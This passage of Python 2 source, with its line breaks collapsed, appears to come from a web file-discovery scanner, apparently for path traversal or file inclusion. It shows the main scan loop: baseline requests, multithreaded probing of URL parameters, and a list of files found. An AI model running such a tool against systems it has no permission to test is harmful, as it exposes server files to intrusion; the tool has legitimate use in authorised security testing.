print("[!] Please always use non-empty (valid) parameter values.") print("[!] No usable GET/POST parameters found.") exit() if args.os: kb.restrict_os = args.os print("[i] Starting scan at: %s\n" % time.strftime("%X")) print("[i] Checking original response...") request_args = prepare_request(None) request_args["url"] = args.url if args.data: request_args["data"] = args.data kb.original_response = get_page(**request_args) if not kb.original_response: print("[!] Something seems to be wrong with connection settings.") if not args.verbose: print("[i] Please rerun with switch '-v'.") exit() print("[i] Checking invalid response...") request_args = prepare_request("%s%s%s" % (args.prefix, INVALID_FILENAME, args.postfix)) kb.invalid_response = get_page(**request_args) print("[i] Done!") print("[i] Searching for files...") if args.threads > 1: print("[i] Starting %d threads." % args.threads) threads = [] for i in xrange(args.threads): thread = threading.Thread(target=try_cases, args=([cases[_] for _ in xrange(i, len(cases), args.threads)],)) thread.daemon = True thread.start() threads.append(thread) alive = True while alive: alive = False for thread in threads: if thread.isAlive(): alive = True time.sleep(0.1) if not kb.found: print("[i] No files found!") elif args.verbose: print("\n[i] Files found:") for _ in kb.files: print("[o] %s" % _) print(" \n[i] File search complete.") print("\n[i] Finishing scan at: %s\n" % time.strftime("%X"))